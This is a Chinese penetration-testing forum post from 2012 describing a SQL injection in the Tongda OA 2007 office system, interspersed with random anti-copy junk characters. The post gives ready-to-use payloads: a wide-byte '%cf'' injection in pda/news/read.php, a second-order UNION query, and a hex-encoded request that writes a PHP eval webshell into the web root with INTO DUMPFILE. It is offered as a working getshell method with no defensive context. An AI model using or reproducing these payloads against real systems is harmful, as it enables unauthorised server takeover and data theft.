中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本1 j4 F3 E3 q- Z& y( K- U) q

- b# d  \9 p/ y/ r8 J3 R% S& S
) c% q! F; J+ eOffice Anywhere 2007 网络智能办公系统% k: E4 d3 J2 v, e6 @

4 N$ Y) c- j5 l$ `http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..  `0 w; \. f- E( n/ @
% z9 j1 P1 [: `: Z
) P" z# C/ k; a! s, v0 Q5 [! }
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
* U) E6 |: n: \, n   j3 p5 }$ Y6 A$ e
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
5 d5 i5 [, l3 @" M* j/ Z7 Q! h  H0 b其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了! h1 b' }$ F. Z( @( d4 d

) L5 ^2 `* G' o' |, n# y这个时候我们是不是可以组合起来使用哪?" F2 k: w& B+ @+ e

9 J/ W6 H* n  r% L) r" d8 C$ q+ l第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
0 r" |1 q# B- K  w9 Runion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10  a7 u, E. {( ~- B
- Y* j' e* e/ n8 `( Z
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
$ Y9 S2 q, J) }# v3 Q
( b" I9 E5 z' `& @! J那么问题来了,单引号可以吗?当然是不可以的,^_^。。。8 e- e+ \- L4 Z1 D

  `  w: H  C/ O7 j0 }8 l! r那么我们用字符串格式带入进行hex编码
% d! a/ I$ n; `" ] . |/ K1 P* j. F) k4 ~2 k  b
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23) N2 q0 t* z- Y1 K, G& J$ }
- a7 M1 t6 l7 p
测试ok,获取oa的webshell1 q+ P/ K% v5 w7 `% b9 X0 ^

9 h4 s. ^$ N1 j' B   x8 [* ~: B1 I' A7 I
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23+ F8 D  N) [' w/ y- h) W
直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2